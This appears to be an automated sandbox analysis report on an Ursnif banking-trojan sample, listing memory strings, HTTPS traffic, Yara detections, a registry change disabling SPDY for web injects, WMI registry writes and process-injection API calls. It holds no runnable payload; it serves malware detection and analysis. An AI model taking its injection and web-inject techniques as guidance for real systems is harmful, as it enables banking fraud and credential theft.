Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000021.00000000.358808752.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000021.00000000.358808752.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000021.00000000.358808752.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000021.00000000.358808752.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000021.00000000.358808752.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000021.00000000.358808752.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000021.00000000.358808752.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://client-s.gateway.messenger.live.com
Source: ~DF86A9972C2BDD16F4.TMP.3.dr	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: ~DF86A9972C2BDD16F4.TMP.3.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: ~DF86A9972C2BDD16F4.TMP.3.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: powershell.exe, 00000019.00000002.396260184.000001D9ADEA6000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000019.00000002.396260184.000001D9ADEA6000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000019.00000002.396260184.000001D9ADEA6000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: explorer.exe, 00000021.00000003.369204810.000000000E4D1000.00000004.00000040.sdmp	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: powershell.exe, 00000019.00000002.377538571.000001D99E051000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: explorer.exe, 00000021.00000002.474280683.0000000001398000.00000004.00000020.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19aqpz?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=
Source: explorer.exe, 00000021.00000002.474280683.0000000001398000.00000004.00000020.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bj77G?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://login.skype.com/login/oauth/microsoft?client_id=738133
Source: powershell.exe, 00000019.00000002.396260184.000001D9ADEA6000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/#qt=mru
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/?qt=allmyphotos;Aktuelle
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/?qt=mru;Aktuelle
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/?qt=mru;OneDrive-App
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/about/en/download/
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com;Fotos
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com;OneDrive-App
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com?wt.mc_id=oo_msn_msnhomepage_header
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://outlook.live.com/calendar
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://outlook.live.com/mail/deeplink/compose;Kalender
Source: explorer.exe, 00000021.00000003.369204810.000000000E4D1000.00000004.00000040.sdmp	String found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
Source: ~DF86A9972C2BDD16F4.TMP.3.dr	String found in binary or memory: https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg
Source: explorer.exe, 00000021.00000003.369204810.000000000E4D1000.00000004.00000040.sdmp	String found in binary or memory: https://s.yimg.com/lo/api/res/1.2/BXjlWewXmZ47HeV5NPvUYA--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
Source: imagestore.dat.4.dr, imagestore.dat.3.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://support.skype.com
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://twitter.com/i/notifications;Ich
Source: ~DF86A9972C2BDD16F4.TMP.3.dr	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
Source: explorer.exe, 00000021.00000000.357547663.0000000008907000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehpdll
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.skype.com/de
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.skype.com/de/download-skype
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin

Uses HTTPS

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Source: Yara match	File source: 00000001.00000003.223302153.0000000005138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.367530874.0000000000870000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.354944479.0000000003290000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.359558033.000001C73EF40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.223173765.0000000005138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.223209468.0000000005138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.223261296.0000000005138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.223239089.0000000005138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.336440905.00000000008A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.479961254.000001FC13595000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.223385631.0000000005138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.223396967.0000000005138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.361030541.000001C73F145000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.360941487.0000000000C25000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.333669010.000001D9B67B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.223326462.0000000005138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.345685075.000001EFE0D70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.280179571.0000000004F3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3388, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 5348, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2344, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 5248, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5540, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3668, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Source: Yara match	File source: 00000001.00000003.223302153.0000000005138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.367530874.0000000000870000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.354944479.0000000003290000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.359558033.000001C73EF40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.223173765.0000000005138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.223209468.0000000005138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.223261296.0000000005138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.223239089.0000000005138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.336440905.00000000008A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.479961254.000001FC13595000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.223385631.0000000005138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.223396967.0000000005138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.361030541.000001C73F145000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.360941487.0000000000C25000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.333669010.000001D9B67B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.223326462.0000000005138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.345685075.000001EFE0D70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.280179571.0000000004F3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3388, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 5348, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2344, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 5248, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5540, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3668, type: MEMORY

Disables SPDY (HTTP compression, likely to perform web injects)

Source: C:\Windows\explorer.exe

Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

Writes or reads registry keys via WMI

Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Contains functionality to call native functions

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00DA4093 GetProcAddress,NtCreateSection,memset,		1_2_00DA4093
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00DA64BF NtMapViewOfSection,		1_2_00DA64BF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00DA9E28 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,		1_2_00DA9E28
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00DAB2CD NtQueryVirtualMemory,		1_2_00DAB2CD
Source: C:\Windows\System32\control.exe	Code function: 34_2_00C088E0 NtQueryInformationToken,NtQueryInformationToken,NtClose,		34_2_00C088E0
Source: C:\Windows\System32\control.exe	Code function: 34_2_00C0A9D8 NtWriteVirtualMemory,		34_2_00C0A9D8
Source: C:\Windows\System32\control.exe	Code function: 34_2_00BF91C0 NtQueryInformationProcess,		34_2_00BF91C0
Source: C:\Windows\System32\control.exe	Code function: 34_2_00BF6104 NtQueryInformationProcess,		34_2_00BF6104
Source: C:\Windows\System32\control.exe	Code function: 34_2_00C01920 NtReadVirtualMemory,		34_2_00C01920
Source: C:\Windows\System32\control.exe	Code function: 34_2_00C0DE98 NtAllocateVirtualMemory,		34_2_00C0DE98
Source: C:\Windows\System32\control.exe	Code function: 34_2_00C067C8 RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,		34_2_00C067C8
Source: C:\Windows\System32\control.exe	Code function: 34_2_00C0D748 NtMapViewOfSection,		34_2_00C0D748
Source: C:\Windows\System32\control.exe	Code function: 34_2_00C0EB10 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,		34_2_00C0EB10
Source: C:\Windows\System32\control.exe	Code function: 34_2_00C07B34 NtCreateSection,		34_2_00C07B34
Source: C:\Windows\System32\control.exe	Code function: 34_2_00C29048 NtProtectVirtualMemory,NtProtectVirtualMemory,		34_2_00C29048
Source: C:\Windows\System32\rundll32.exe	Code function: 38_2_000001C73F1288E0 NtQueryInformationToken,NtQueryInformationToken,NtClose,		38_2_000001C73F1288E0
Source: C:\Windows\System32\rundll32.exe	Code function: 38_2_000001C73F1191C0 NtQueryInformationProcess,		38_2_000001C73F1191C0
Source: C:\Windows\System32\rundll32.exe	Code function: 38_2_000001C73F149002 NtProtectVirtualMemory,NtProtectVirtualMemory,		38_2_000001C73F149002

Detected potential crypto function

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00DAB0AC		1_2_00DAB0AC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00DA8534		1_2_00DA8534
Source: C:\Windows\System32\control.exe	Code function: 34_2_00C02A04		34_2_00C02A04
Source: C:\Windows\System32\control.exe	Code function: 34_2_00C067C8		34_2_00C067C8
Source: C:\Windows\System32\control.exe	Code function: 34_2_00BF932C		34_2_00BF932C
Source: C:\Windows\System32\control.exe	Code function: 34_2_00C064DC		34_2_00C064DC
Source: C:\Windows\System32\control.exe	Code function: 34_2_00BF3498		34_2_00BF3498
Source: C:\Windows\System32\control.exe	Code function: 34_2_00C0CC80		34_2_00C0CC80
Source: C:\Windows\System32\control.exe	Code function: 34_2_00C0909C		34_2_00C0909C
Source: C:\Windows\System32\control.exe	Code function: 34_2_00C0C8A8		34_2_00C0C8A8
Source: C:\Windows\System32\control.exe	Code function: 34_2_00C0F06C		34_2_00C0F06C
Source: C:\Windows\System32\control.exe	Code function: 34_2_00C0CC1C		34_2_00C0CC1C
Source: C:\Windows\System32\control.exe	Code function: 34_2_00BFA1A0		34_2_00BFA1A0
Source: C:\Windows\System32\control.exe	Code function: 34_2_00C131A4		34_2_00C131A4
Source: C:\Windows\System32\control.exe	Code function: 34_2_00BFFDD8		34_2_00BFFDD8
Source: C:\Windows\System32\control.exe	Code function: 34_2_00C1654C		34_2_00C1654C
Source: C:\Windows\System32\control.exe	Code function: 34_2_00BF8D2C		34_2_00BF8D2C
Source: C:\Windows\System32\control.exe	Code function: 34_2_00C0096B		34_2_00C0096B
Source: C:\Windows\System32\control.exe	Code function: 34_2_00C1117C		34_2_00C1117C
Source: C:\Windows\System32\control.exe	Code function: 34_2_00C0051C		34_2_00C0051C
Source: C:\Windows\System32\control.exe	Code function: 34_2_00C00EC4		34_2_00C00EC4
Source: C:\Windows\System32\control.exe	Code function: 34_2_00BFA6A4		34_2_00BFA6A4
Source: C:\Windows\System32\control.exe	Code function: 34_2_00BFB2A4		34_2_00BFB2A4
Source: C:\Windows\System32\control.exe	Code function: 34_2_00C17EDC		34_2_00C17EDC
Source: C:\Windows\System32\control.exe	Code function: 34_2_00BF4AA0		34_2_00BF4AA0
Source: C:\Windows\System32\control.exe	Code function: 34_2_00C15A88		34_2_00C15A88
Source: C:\Windows\System32\control.exe	Code function: 34_2_00C03A9C		34_2_00C03A9C
Source: C:\Windows\System32\control.exe	Code function: 34_2_00BF7ED8		34_2_00BF7ED8
Source: C:\Windows\System32\control.exe	Code function: 34_2_00C02648		34_2_00C02648
Source: C:\Windows\System32\control.exe	Code function: 34_2_00C04670		34_2_00C04670
Source: C:\Windows\System32\control.exe	Code function: 34_2_00C0C224		34_2_00C0C224
Source: C:\Windows\System32\control.exe	Code function: 34_2_00C17228		34_2_00C17228
Source: C:\Windows\System32\control.exe	Code function: 34_2_00BF964C		34_2_00BF964C
Source: C:\Windows\System32\control.exe	Code function: 34_2_00C0F7D4		34_2_00C0F7D4
Source: C:\Windows\System32\control.exe	Code function: 34_2_00C16BDC		34_2_00C16BDC
Source: C:\Windows\System32\control.exe	Code function: 34_2_00BF6380		34_2_00BF6380
Source: C:\Windows\System32\control.exe	Code function: 34_2_00C14FA8		34_2_00C14FA8
Source: C:\Windows\System32\control.exe	Code function: 34_2_00BF5B40		34_2_00BF5B40
Source: C:\Windows\System32\rundll32.exe	Code function: 38_2_000001C73F11932C		38_2_000001C73F11932C
Source: C:\Windows\System32\rundll32.exe	Code function: 38_2_000001C73F122A04		38_2_000001C73F122A04
Source: C:\Windows\System32\rundll32.exe	Code function: 38_2_000001C73F12CC1C		38_2_000001C73F12CC1C
Source: C:\Windows\System32\rundll32.exe	Code function: 38_2_000001C73F12CC80		38_2_000001C73F12CC80
Source: C:\Windows\System32\rundll32.exe	Code function: 38_2_000001C73F12F06C		38_2_000001C73F12F06C
Source: C:\Windows\System32\rundll32.exe	Code function: 38_2_000001C73F113498		38_2_000001C73F113498
Source: C:\Windows\System32\rundll32.exe	Code function: 38_2_000001C73F12909C		38_2_000001C73F12909C
Source: C:\Windows\System32\rundll32.exe	Code function: 38_2_000001C73F12C8A8		38_2_000001C73F12C8A8
Source: C:\Windows\System32\rundll32.exe	Code function: 38_2_000001C73F1264DC		38_2_000001C73F1264DC
Source: C:\Windows\System32\rundll32.exe	Code function: 38_2_000001C73F115B40		38_2_000001C73F115B40
Source: C:\Windows\System32\rundll32.exe	Code function: 38_2_000001C73F116380		38_2_000001C73F116380
Source: C:\Windows\System32\rundll32.exe	Code function: 38_2_000001C73F134FA8		38_2_000001C73F134FA8
Source: C:\Windows\System32\rundll32.exe	Code function: 38_2_000001C73F136BDC		38_2_000001C73F136BDC
Source: C:\Windows\System32\rundll32.exe	Code function: 38_2_000001C73F1267C8		38_2_000001C73F1267C8
Source: C:\Windows\System32\rundll32.exe	Code function: 38_2_000001C73F12F7D4		38_2_000001C73F12F7D4
Source: C:\Windows\System32\rundll32.exe	Code function: 38_2_000001C73F12C224		38_2_000001C73F12C224
Source: C:\Windows\System32\rundll32.exe	Code function: 38_2_000001C73F137228		38_2_000001C73F137228
Source: C:\Windows\System32\rundll32.exe	Code function: 38_2_000001C73F122648		38_2_000001C73F122648
Source: C:\Windows\System32\rundll32.exe	Code function: 38_2_000001C73F11964C		38_2_000001C73F11964C
Source: C:\Windows\System32\rundll32.exe	Code function: 38_2_000001C73F124670		38_2_000001C73F124670
Source: C:\Windows\System32\rundll32.exe	Code function: 38_2_000001C73F123A9C		38_2_000001C73F123A9C
Source: C:\Windows\System32\rundll32.exe	Code function: 38_2_000001C73F114AA0		38_2_000001C73F114AA0
Source: C:\Windows\System32\rundll32.exe	Code function: 38_2_000001C73F11A6A4		38_2_000001C73F11A6A4
Source: C:\Windows\System32\rundll32.exe	Code function: 38_2_000001C73F11B2A4		38_2_000001C73F11B2A4
